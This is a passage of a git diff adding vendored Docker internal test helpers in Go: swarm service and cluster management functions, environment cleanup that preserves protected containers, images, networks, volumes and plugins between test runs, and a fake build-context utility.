+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+
+	res, err := cli.ServiceCreate(ctx, service.Spec, opts)
+	assert.NilError(t, err)
+	return res.ID
+}
+
+// CreateService creates a swarm service given the specified service constructor
+func (d *Daemon) CreateService(t assert.TestingT, f ...ServiceConstructor) string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	return d.createServiceWithOptions(t, types.ServiceCreateOptions{}, f...)
+}
+
+// GetService returns the swarm service corresponding to the specified id
+func (d *Daemon) GetService(t assert.TestingT, id string) *swarm.Service {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	service, _, err := cli.ServiceInspectWithRaw(context.Background(), id, types.ServiceInspectOptions{})
+	assert.NilError(t, err)
+	return &service
+}
+
+// GetServiceTasks returns the swarm tasks for the specified service
+func (d *Daemon) GetServiceTasks(t assert.TestingT, service string) []swarm.Task {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	filterArgs := filters.NewArgs()
+	filterArgs.Add("desired-state", "running")
+	filterArgs.Add("service", service)
+
+	options := types.TaskListOptions{
+		Filters: filterArgs,
+	}
+
+	tasks, err := cli.TaskList(context.Background(), options)
+	assert.NilError(t, err)
+	return tasks
+}
+
+// UpdateService updates a swarm service with the specified service constructor
+func (d *Daemon) UpdateService(t assert.TestingT, service *swarm.Service, f ...ServiceConstructor) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	for _, fn := range f {
+		fn(service)
+	}
+
+	_, err := cli.ServiceUpdate(context.Background(), service.ID, service.Version, service.Spec, types.ServiceUpdateOptions{})
+	assert.NilError(t, err)
+}
+
+// RemoveService removes the specified service
+func (d *Daemon) RemoveService(t assert.TestingT, id string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	err := cli.ServiceRemove(context.Background(), id)
+	assert.NilError(t, err)
+}
+
+// ListServices returns the list of the current swarm services
+func (d *Daemon) ListServices(t assert.TestingT) []swarm.Service {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	services, err := cli.ServiceList(context.Background(), types.ServiceListOptions{})
+	assert.NilError(t, err)
+	return services
+}
+
+// GetTask returns the swarm task identified by the specified id
+func (d *Daemon) GetTask(t assert.TestingT, id string) swarm.Task {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	task, _, err := cli.TaskInspectWithRaw(context.Background(), id)
+	assert.NilError(t, err)
+	return task
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/swarm.go b/vendor/github.com/docker/docker/internal/test/daemon/swarm.go
new file mode 100644
index 0000000000..e8e8b945de
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/swarm.go
@@ -0,0 +1,194 @@
+package daemon
+
+import (
+	"context"
+	"fmt"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/internal/test"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+)
+
+const (
+	// DefaultSwarmPort is the default port use for swarm in the tests
+	DefaultSwarmPort       = 2477
+	defaultSwarmListenAddr = "0.0.0.0"
+)
+
+// StartAndSwarmInit starts the daemon (with busybox) and init the swarm
+func (d *Daemon) StartAndSwarmInit(t testingT) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	// avoid networking conflicts
+	args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"}
+	d.StartWithBusybox(t, args...)
+
+	d.SwarmInit(t, swarm.InitRequest{})
+}
+
+// StartAndSwarmJoin starts the daemon (with busybox) and join the specified swarm as worker or manager
+func (d *Daemon) StartAndSwarmJoin(t testingT, leader *Daemon, manager bool) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	// avoid networking conflicts
+	args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"}
+	d.StartWithBusybox(t, args...)
+
+	tokens := leader.JoinTokens(t)
+	token := tokens.Worker
+	if manager {
+		token = tokens.Manager
+	}
+	d.SwarmJoin(t, swarm.JoinRequest{
+		RemoteAddrs: []string{leader.SwarmListenAddr()},
+		JoinToken:   token,
+	})
+}
+
+// SpecConstructor defines a swarm spec constructor
+type SpecConstructor func(*swarm.Spec)
+
+// SwarmListenAddr returns the listen-addr used for the daemon
+func (d *Daemon) SwarmListenAddr() string {
+	return fmt.Sprintf("%s:%d", d.swarmListenAddr, d.SwarmPort)
+}
+
+// NodeID returns the swarm mode node ID
+func (d *Daemon) NodeID() string {
+	return d.CachedInfo.Swarm.NodeID
+}
+
+// SwarmInit initializes a new swarm cluster.
+func (d *Daemon) SwarmInit(t assert.TestingT, req swarm.InitRequest) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	if req.ListenAddr == "" {
+		req.ListenAddr = fmt.Sprintf("%s:%d", d.swarmListenAddr, d.SwarmPort)
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+	_, err := cli.SwarmInit(context.Background(), req)
+	assert.NilError(t, err, "initializing swarm")
+	d.CachedInfo = d.Info(t)
+}
+
+// SwarmJoin joins a daemon to an existing cluster.
+func (d *Daemon) SwarmJoin(t assert.TestingT, req swarm.JoinRequest) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	if req.ListenAddr == "" {
+		req.ListenAddr = fmt.Sprintf("%s:%d", d.swarmListenAddr, d.SwarmPort)
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+	err := cli.SwarmJoin(context.Background(), req)
+	assert.NilError(t, err, "initializing swarm")
+	d.CachedInfo = d.Info(t)
+}
+
+// SwarmLeave forces daemon to leave current cluster.
+func (d *Daemon) SwarmLeave(force bool) error {
+	cli, err := d.NewClient()
+	if err != nil {
+		return fmt.Errorf("leaving swarm: failed to create client %v", err)
+	}
+	defer cli.Close()
+	err = cli.SwarmLeave(context.Background(), force)
+	if err != nil {
+		err = fmt.Errorf("leaving swarm: %v", err)
+	}
+	return err
+}
+
+// SwarmInfo returns the swarm information of the daemon
+func (d *Daemon) SwarmInfo(t assert.TestingT) swarm.Info {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	info, err := cli.Info(context.Background())
+	assert.NilError(t, err, "get swarm info")
+	return info.Swarm
+}
+
+// SwarmUnlock tries to unlock a locked swarm
+func (d *Daemon) SwarmUnlock(req swarm.UnlockRequest) error {
+	cli, err := d.NewClient()
+	if err != nil {
+		return fmt.Errorf("unlocking swarm: failed to create client %v", err)
+	}
+	defer cli.Close()
+	err = cli.SwarmUnlock(context.Background(), req)
+	if err != nil {
+		err = errors.Wrap(err, "unlocking swarm")
+	}
+	return err
+}
+
+// GetSwarm returns the current swarm object
+func (d *Daemon) GetSwarm(t assert.TestingT) swarm.Swarm {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	sw, err := cli.SwarmInspect(context.Background())
+	assert.NilError(t, err)
+	return sw
+}
+
+// UpdateSwarm updates the current swarm object with the specified spec constructors
+func (d *Daemon) UpdateSwarm(t assert.TestingT, f ...SpecConstructor) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	sw := d.GetSwarm(t)
+	for _, fn := range f {
+		fn(&sw.Spec)
+	}
+
+	err := cli.SwarmUpdate(context.Background(), sw.Version, sw.Spec, swarm.UpdateFlags{})
+	assert.NilError(t, err)
+}
+
+// RotateTokens update the swarm to rotate tokens
+func (d *Daemon) RotateTokens(t assert.TestingT) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	sw, err := cli.SwarmInspect(context.Background())
+	assert.NilError(t, err)
+
+	flags := swarm.UpdateFlags{
+		RotateManagerToken: true,
+		RotateWorkerToken:  true,
+	}
+
+	err = cli.SwarmUpdate(context.Background(), sw.Version, sw.Spec, flags)
+	assert.NilError(t, err)
+}
+
+// JoinTokens returns the current swarm join tokens
+func (d *Daemon) JoinTokens(t assert.TestingT) swarm.JoinTokens {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	sw, err := cli.SwarmInspect(context.Background())
+	assert.NilError(t, err)
+	return sw.JoinTokens
+}
diff --git a/vendor/github.com/docker/docker/internal/test/environment/clean.go b/vendor/github.com/docker/docker/internal/test/environment/clean.go
new file mode 100644
index 0000000000..93dee593f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/environment/clean.go
@@ -0,0 +1,217 @@
+package environment // import "github.com/docker/docker/internal/test/environment"
+
+import (
+	"context"
+	"regexp"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/internal/test"
+	"gotest.tools/assert"
+)
+
+type testingT interface {
+	assert.TestingT
+	logT
+	Fatalf(string, ...interface{})
+}
+
+type logT interface {
+	Logf(string, ...interface{})
+}
+
+// Clean the environment, preserving protected objects (images, containers, ...)
+// and removing everything else. It's meant to run after any tests so that they don't
+// depend on each others.
+func (e *Execution) Clean(t assert.TestingT) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	client := e.APIClient()
+
+	platform := e.OSType
+	if (platform != "windows") || (platform == "windows" && e.DaemonInfo.Isolation == "hyperv") {
+		unpauseAllContainers(t, client)
+	}
+	deleteAllContainers(t, client, e.protectedElements.containers)
+	deleteAllImages(t, client, e.protectedElements.images)
+	deleteAllVolumes(t, client, e.protectedElements.volumes)
+	deleteAllNetworks(t, client, platform, e.protectedElements.networks)
+	if platform == "linux" {
+		deleteAllPlugins(t, client, e.protectedElements.plugins)
+	}
+}
+
+func unpauseAllContainers(t assert.TestingT, client client.ContainerAPIClient) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	ctx := context.Background()
+	containers := getPausedContainers(ctx, t, client)
+	if len(containers) > 0 {
+		for _, container := range containers {
+			err := client.ContainerUnpause(ctx, container.ID)
+			assert.Check(t, err, "failed to unpause container %s", container.ID)
+		}
+	}
+}
+
+func getPausedContainers(ctx context.Context, t assert.TestingT, client client.ContainerAPIClient) []types.Container {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	filter := filters.NewArgs()
+	filter.Add("status", "paused")
+	containers, err := client.ContainerList(ctx, types.ContainerListOptions{
+		Filters: filter,
+		Quiet:   true,
+		All:     true,
+	})
+	assert.Check(t, err, "failed to list containers")
+	return containers
+}
+
+var alreadyExists = regexp.MustCompile(`Error response from daemon: removal of container (\w+) is already in progress`)
+
+func deleteAllContainers(t assert.TestingT, apiclient client.ContainerAPIClient, protectedContainers map[string]struct{}) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	ctx := context.Background()
+	containers := getAllContainers(ctx, t, apiclient)
+	if len(containers) == 0 {
+		return
+	}
+
+	for _, container := range containers {
+		if _, ok := protectedContainers[container.ID]; ok {
+			continue
+		}
+		err := apiclient.ContainerRemove(ctx, container.ID, types.ContainerRemoveOptions{
+			Force:         true,
+			RemoveVolumes: true,
+		})
+		if err == nil || client.IsErrNotFound(err) || alreadyExists.MatchString(err.Error()) || isErrNotFoundSwarmClassic(err) {
+			continue
+		}
+		assert.Check(t, err, "failed to remove %s", container.ID)
+	}
+}
+
+func getAllContainers(ctx context.Context, t assert.TestingT, client client.ContainerAPIClient) []types.Container {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	containers, err := client.ContainerList(ctx, types.ContainerListOptions{
+		Quiet: true,
+		All:   true,
+	})
+	assert.Check(t, err, "failed to list containers")
+	return containers
+}
+
+func deleteAllImages(t assert.TestingT, apiclient client.ImageAPIClient, protectedImages map[string]struct{}) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	images, err := apiclient.ImageList(context.Background(), types.ImageListOptions{})
+	assert.Check(t, err, "failed to list images")
+
+	ctx := context.Background()
+	for _, image := range images {
+		tags := tagsFromImageSummary(image)
+		if len(tags) == 0 {
+			removeImage(ctx, t, apiclient, image.ID)
+			continue
+		}
+		for _, tag := range tags {
+			if _, ok := protectedImages[tag]; !ok {
+				removeImage(ctx, t, apiclient, tag)
+			}
+		}
+	}
+}
+
+func removeImage(ctx context.Context, t assert.TestingT, apiclient client.ImageAPIClient, ref string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	_, err := apiclient.ImageRemove(ctx, ref, types.ImageRemoveOptions{
+		Force: true,
+	})
+	if client.IsErrNotFound(err) {
+		return
+	}
+	assert.Check(t, err, "failed to remove image %s", ref)
+}
+
+func deleteAllVolumes(t assert.TestingT, c client.VolumeAPIClient, protectedVolumes map[string]struct{}) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	volumes, err := c.VolumeList(context.Background(), filters.Args{})
+	assert.Check(t, err, "failed to list volumes")
+
+	for _, v := range volumes.Volumes {
+		if _, ok := protectedVolumes[v.Name]; ok {
+			continue
+		}
+		err := c.VolumeRemove(context.Background(), v.Name, true)
+		// Docker EE may list volumes that no longer exist.
+		if isErrNotFoundSwarmClassic(err) {
+			continue
+		}
+		assert.Check(t, err, "failed to remove volume %s", v.Name)
+	}
+}
+
+func deleteAllNetworks(t assert.TestingT, c client.NetworkAPIClient, daemonPlatform string, protectedNetworks map[string]struct{}) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	networks, err := c.NetworkList(context.Background(), types.NetworkListOptions{})
+	assert.Check(t, err, "failed to list networks")
+
+	for _, n := range networks {
+		if n.Name == "bridge" || n.Name == "none" || n.Name == "host" {
+			continue
+		}
+		if _, ok := protectedNetworks[n.ID]; ok {
+			continue
+		}
+		if daemonPlatform == "windows" && strings.ToLower(n.Name) == "nat" {
+			// nat is a pre-defined network on Windows and cannot be removed
+			continue
+		}
+		err := c.NetworkRemove(context.Background(), n.ID)
+		assert.Check(t, err, "failed to remove network %s", n.ID)
+	}
+}
+
+func deleteAllPlugins(t assert.TestingT, c client.PluginAPIClient, protectedPlugins map[string]struct{}) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	plugins, err := c.PluginList(context.Background(), filters.Args{})
+	// Docker EE does not allow cluster-wide plugin management.
+	if client.IsErrNotImplemented(err) {
+		return
+	}
+	assert.Check(t, err, "failed to list plugins")
+
+	for _, p := range plugins {
+		if _, ok := protectedPlugins[p.Name]; ok {
+			continue
+		}
+		err := c.PluginRemove(context.Background(), p.Name, types.PluginRemoveOptions{Force: true})
+		assert.Check(t, err, "failed to remove plugin %s", p.ID)
+	}
+}
+
+// Swarm classic aggregates node errors and returns a 500 so we need to check
+// the error string instead of just IsErrNotFound().
+func isErrNotFoundSwarmClassic(err error) bool {
+	return err != nil && strings.Contains(strings.ToLower(err.Error()), "no such")
+}
diff --git a/vendor/github.com/docker/docker/internal/test/environment/environment.go b/vendor/github.com/docker/docker/internal/test/environment/environment.go
new file mode 100644
index 0000000000..74c8e2ce0a
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/environment/environment.go
@@ -0,0 +1,158 @@
+package environment // import "github.com/docker/docker/internal/test/environment"
+
+import (
+	"context"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/internal/test/fixtures/load"
+	"github.com/pkg/errors"
+)
+
+// Execution contains information about the current test execution and daemon
+// under test
+type Execution struct {
+	client            client.APIClient
+	DaemonInfo        types.Info
+	OSType            string
+	PlatformDefaults  PlatformDefaults
+	protectedElements protectedElements
+}
+
+// PlatformDefaults are defaults values for the platform of the daemon under test
+type PlatformDefaults struct {
+	BaseImage            string
+	VolumesConfigPath    string
+	ContainerStoragePath string
+}
+
+// New creates a new Execution struct
+func New() (*Execution, error) {
+	client, err := client.NewClientWithOpts(client.FromEnv)
+	if err != nil {
+		return nil, errors.Wrapf(err, "failed to create client")
+	}
+
+	info, err := client.Info(context.Background())
+	if err != nil {
+		return nil, errors.Wrapf(err, "failed to get info from daemon")
+	}
+
+	osType := getOSType(info)
+
+	return &Execution{
+		client:            client,
+		DaemonInfo:        info,
+		OSType:            osType,
+		PlatformDefaults:  getPlatformDefaults(info, osType),
+		protectedElements: newProtectedElements(),
+	}, nil
+}
+
+func getOSType(info types.Info) string {
+	// Docker EE does not set the OSType so allow the user to override this value.
+	userOsType := os.Getenv("TEST_OSTYPE")
+	if userOsType != "" {
+		return userOsType
+	}
+	return info.OSType
+}
+
+func getPlatformDefaults(info types.Info, osType string) PlatformDefaults {
+	volumesPath := filepath.Join(info.DockerRootDir, "volumes")
+	containersPath := filepath.Join(info.DockerRootDir, "containers")
+
+	switch osType {
+	case "linux":
+		return PlatformDefaults{
+			BaseImage:            "scratch",
+			VolumesConfigPath:    toSlash(volumesPath),
+			ContainerStoragePath: toSlash(containersPath),
+		}
+	case "windows":
+		baseImage := "microsoft/windowsservercore"
+		if override := os.Getenv("WINDOWS_BASE_IMAGE"); override != "" {
+			baseImage = override
+			fmt.Println("INFO: Windows Base image is ", baseImage)
+		}
+		return PlatformDefaults{
+			BaseImage:            baseImage,
+			VolumesConfigPath:    filepath.FromSlash(volumesPath),
+			ContainerStoragePath: filepath.FromSlash(containersPath),
+		}
+	default:
+		panic(fmt.Sprintf("unknown OSType for daemon: %s", osType))
+	}
+}
+
+// Make sure in context of daemon, not the local platform. Note we can't
+// use filepath.FromSlash or ToSlash here as they are a no-op on Unix.
+func toSlash(path string) string {
+	return strings.Replace(path, `\`, `/`, -1)
+}
+
+// IsLocalDaemon is true if the daemon under test is on the same
+// host as the test process.
+//
+// Deterministically working out the environment in which CI is running
+// to evaluate whether the daemon is local or remote is not possible through
+// a build tag.
+//
+// For example Windows to Linux CI under Jenkins tests the 64-bit
+// Windows binary build with the daemon build tag, but calls a remote
+// Linux daemon.
+//
+// We can't just say if Windows then assume the daemon is local as at
+// some point, we will be testing the Windows CLI against a Windows daemon.
+//
+// Similarly, it will be perfectly valid to also run CLI tests from
+// a Linux CLI (built with the daemon tag) against a Windows daemon.
+func (e *Execution) IsLocalDaemon() bool {
+	return os.Getenv("DOCKER_REMOTE_DAEMON") == ""
+}
+
+// IsRemoteDaemon is true if the daemon under test is on different host
+// as the test process.
+func (e *Execution) IsRemoteDaemon() bool {
+	return !e.IsLocalDaemon()
+}
+
+// DaemonAPIVersion returns the negotiated daemon api version
+func (e *Execution) DaemonAPIVersion() string {
+	version, err := e.APIClient().ServerVersion(context.TODO())
+	if err != nil {
+		return ""
+	}
+	return version.APIVersion
+}
+
+// Print the execution details to stdout
+// TODO: print everything
+func (e *Execution) Print() {
+	if e.IsLocalDaemon() {
+		fmt.Println("INFO: Testing against a local daemon")
+	} else {
+		fmt.Println("INFO: Testing against a remote daemon")
+	}
+}
+
+// APIClient returns an APIClient connected to the daemon under test
+func (e *Execution) APIClient() client.APIClient {
+	return e.client
+}
+
+// EnsureFrozenImagesLinux loads frozen test images into the daemon
+// if they aren't already loaded
+func EnsureFrozenImagesLinux(testEnv *Execution) error {
+	if testEnv.OSType == "linux" {
+		err := load.FrozenImagesLinux(testEnv.APIClient(), frozenImages...)
+		if err != nil {
+			return errors.Wrap(err, "error loading frozen images")
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/internal/test/environment/protect.go b/vendor/github.com/docker/docker/internal/test/environment/protect.go
new file mode 100644
index 0000000000..b5b27d2dd4
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/environment/protect.go
@@ -0,0 +1,254 @@
+package environment // import "github.com/docker/docker/internal/test/environment"
+
+import (
+	"context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	dclient "github.com/docker/docker/client"
+	"github.com/docker/docker/internal/test"
+	"gotest.tools/assert"
+)
+
+var frozenImages = []string{"busybox:latest", "busybox:glibc", "hello-world:frozen", "debian:jessie"}
+
+type protectedElements struct {
+	containers map[string]struct{}
+	images     map[string]struct{}
+	networks   map[string]struct{}
+	plugins    map[string]struct{}
+	volumes    map[string]struct{}
+}
+
+func newProtectedElements() protectedElements {
+	return protectedElements{
+		containers: map[string]struct{}{},
+		images:     map[string]struct{}{},
+		networks:   map[string]struct{}{},
+		plugins:    map[string]struct{}{},
+		volumes:    map[string]struct{}{},
+	}
+}
+
+// ProtectAll protects the existing environment (containers, images, networks,
+// volumes, and, on Linux, plugins) from being cleaned up at the end of test
+// runs
+func ProtectAll(t testingT, testEnv *Execution) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	ProtectContainers(t, testEnv)
+	ProtectImages(t, testEnv)
+	ProtectNetworks(t, testEnv)
+	ProtectVolumes(t, testEnv)
+	if testEnv.OSType == "linux" {
+		ProtectPlugins(t, testEnv)
+	}
+}
+
+// ProtectContainer adds the specified container(s) to be protected in case of
+// clean
+func (e *Execution) ProtectContainer(t testingT, containers ...string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	for _, container := range containers {
+		e.protectedElements.containers[container] = struct{}{}
+	}
+}
+
+// ProtectContainers protects existing containers from being cleaned up at the
+// end of test runs
+func ProtectContainers(t testingT, testEnv *Execution) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	containers := getExistingContainers(t, testEnv)
+	testEnv.ProtectContainer(t, containers...)
+}
+
+func getExistingContainers(t assert.TestingT, testEnv *Execution) []string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	client := testEnv.APIClient()
+	containerList, err := client.ContainerList(context.Background(), types.ContainerListOptions{
+		All: true,
+	})
+	assert.NilError(t, err, "failed to list containers")
+
+	var containers []string
+	for _, container := range containerList {
+		containers = append(containers, container.ID)
+	}
+	return containers
+}
+
+// ProtectImage adds the specified image(s) to be protected in case of clean
+func (e *Execution) ProtectImage(t testingT, images ...string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	for _, image := range images {
+		e.protectedElements.images[image] = struct{}{}
+	}
+}
+
+// ProtectImages protects existing images and on linux frozen images from being
+// cleaned up at the end of test runs
+func ProtectImages(t testingT, testEnv *Execution) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	images := getExistingImages(t, testEnv)
+
+	if testEnv.OSType == "linux" {
+		images = append(images, frozenImages...)
+	}
+	testEnv.ProtectImage(t, images...)
+}
+
+func getExistingImages(t assert.TestingT, testEnv *Execution) []string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	client := testEnv.APIClient()
+	filter := filters.NewArgs()
+	filter.Add("dangling", "false")
+	imageList, err := client.ImageList(context.Background(), types.ImageListOptions{
+		All:     true,
+		Filters: filter,
+	})
+	assert.NilError(t, err, "failed to list images")
+
+	var images []string
+	for _, image := range imageList {
+		images = append(images, tagsFromImageSummary(image)...)
+	}
+	return images
+}
+
+func tagsFromImageSummary(image types.ImageSummary) []string {
+	var result []string
+	for _, tag := range image.RepoTags {
+		if tag != "<none>:<none>" {
+			result = append(result, tag)
+		}
+	}
+	for _, digest := range image.RepoDigests {
+		if digest != "<none>@<none>" {
+			result = append(result, digest)
+		}
+	}
+	return result
+}
+
+// ProtectNetwork adds the specified network(s) to be protected in case of
+// clean
+func (e *Execution) ProtectNetwork(t testingT, networks ...string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	for _, network := range networks {
+		e.protectedElements.networks[network] = struct{}{}
+	}
+}
+
+// ProtectNetworks protects existing networks from being cleaned up at the end
+// of test runs
+func ProtectNetworks(t testingT, testEnv *Execution) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	networks := getExistingNetworks(t, testEnv)
+	testEnv.ProtectNetwork(t, networks...)
+}
+
+func getExistingNetworks(t assert.TestingT, testEnv *Execution) []string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	client := testEnv.APIClient()
+	networkList, err := client.NetworkList(context.Background(), types.NetworkListOptions{})
+	assert.NilError(t, err, "failed to list networks")
+
+	var networks []string
+	for _, network := range networkList {
+		networks = append(networks, network.ID)
+	}
+	return networks
+}
+
+// ProtectPlugin adds the specified plugin(s) to be protected in case of clean
+func (e *Execution) ProtectPlugin(t testingT, plugins ...string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	for _, plugin := range plugins {
+		e.protectedElements.plugins[plugin] = struct{}{}
+	}
+}
+
+// ProtectPlugins protects existing plugins from being cleaned up at the end of
+// test runs
+func ProtectPlugins(t testingT, testEnv *Execution) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	plugins := getExistingPlugins(t, testEnv)
+	testEnv.ProtectPlugin(t, plugins...)
+}
+
+func getExistingPlugins(t assert.TestingT, testEnv *Execution) []string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	client := testEnv.APIClient()
+	pluginList, err := client.PluginList(context.Background(), filters.Args{})
+	// Docker EE does not allow cluster-wide plugin management.
+	if dclient.IsErrNotImplemented(err) {
+		return []string{}
+	}
+	assert.NilError(t, err, "failed to list plugins")
+
+	var plugins []string
+	for _, plugin := range pluginList {
+		plugins = append(plugins, plugin.Name)
+	}
+	return plugins
+}
+
+// ProtectVolume adds the specified volume(s) to be protected in case of clean
+func (e *Execution) ProtectVolume(t testingT, volumes ...string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	for _, volume := range volumes {
+		e.protectedElements.volumes[volume] = struct{}{}
+	}
+}
+
+// ProtectVolumes protects existing volumes from being cleaned up at the end of
+// test runs
+func ProtectVolumes(t testingT, testEnv *Execution) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	volumes := getExistingVolumes(t, testEnv)
+	testEnv.ProtectVolume(t, volumes...)
+}
+
+func getExistingVolumes(t assert.TestingT, testEnv *Execution) []string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	client := testEnv.APIClient()
+	volumeList, err := client.VolumeList(context.Background(), filters.Args{})
+	assert.NilError(t, err, "failed to list volumes")
+
+	var volumes []string
+	for _, volume := range volumeList.Volumes {
+		volumes = append(volumes, volume.Name)
+	}
+	return volumes
+}
diff --git a/vendor/github.com/docker/docker/internal/test/fakecontext/context.go b/vendor/github.com/docker/docker/internal/test/fakecontext/context.go
new file mode 100644
index 0000000000..8b11da207e
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/fakecontext/context.go
@@ -0,0 +1,131 @@
+package fakecontext // import "github.com/docker/docker/internal/test/fakecontext"
+
+import (
+	"bytes"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/internal/test"
+	"github.com/docker/docker/pkg/archive"
+)
+
+type testingT interface {
+	Fatal(args ...interface{})
+	Fatalf(string, ...interface{})
+}
+
+// New creates a fake build context
+func New(t testingT, dir string, modifiers ...func(*Fake) error) *Fake {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	fakeContext := &Fake{Dir: dir}
+	if dir == "" {
+		if err := newDir(fakeContext); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	for _, modifier := range modifiers {
+		if err := modifier(fakeContext); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	return fakeContext
+}
+
+func newDir(fake *Fake) error {
+	tmp, err := ioutil.TempDir("", "fake-context")
+	if err != nil {
+		return err
+	}
+	if err := os.Chmod(tmp, 0755); err != nil {
+		return err
+	}
+	fake.Dir = tmp
+	return nil
+}
+
+// WithFile adds the specified file (with content) in the build context
+func WithFile(name, content string) func(*Fake) error {
+	return func(ctx *Fake) error {
+		return ctx.Add(name, content)
+	}
+}
+
+// WithDockerfile adds the specified content as Dockerfile in the build context
+func WithDockerfile(content string) func(*Fake) error {
+	return WithFile("Dockerfile", content)
+}
+
+// WithFiles adds the specified files in the build context, content is a string
+func WithFiles(files map[string]string) func(*Fake) error {
+	return func(fakeContext *Fake) error {
+		for file, content := range files {
+			if err := fakeContext.Add(file, content); err != nil {
+				return err
+			}
+		}
+		return nil
+	}
+}
+
+// WithBinaryFiles adds the specified files in the build context, content is binary
+func WithBinaryFiles(files map[string]*bytes.Buffer) func(*Fake) error {
+	return func(fakeContext *Fake) error {
+		for file, content := range files {
+			if err := fakeContext.Add(file, content.String()); err != nil {
+				return err
+			}
+		}
+		return nil
+	}
+}
+
+// Fake creates directories that can be used as a build context
+type Fake struct {
+	Dir string
+}
+
+// Add a file at a path, creating directories where necessary
+func (f *Fake) Add(file, content string) error {
+	return f.addFile(file, []byte(content))
+}
+
+func (f *Fake) addFile(file string, content []byte) error {
+	fp := filepath.Join(f.Dir, filepath.FromSlash(file))
+	dirpath := filepath.Dir(fp)
+	if dirpath != "." {
+		if err := os.MkdirAll(dirpath, 0755); err != nil {
+			return err
+		}
+	}
+	return ioutil.WriteFile(fp, content, 0644)
+
+}
+
+// Delete a file at a path
+func (f *Fake) Delete(file string) error {
+	fp := filepath.Join(f.Dir, filepath.FromSlash(file))
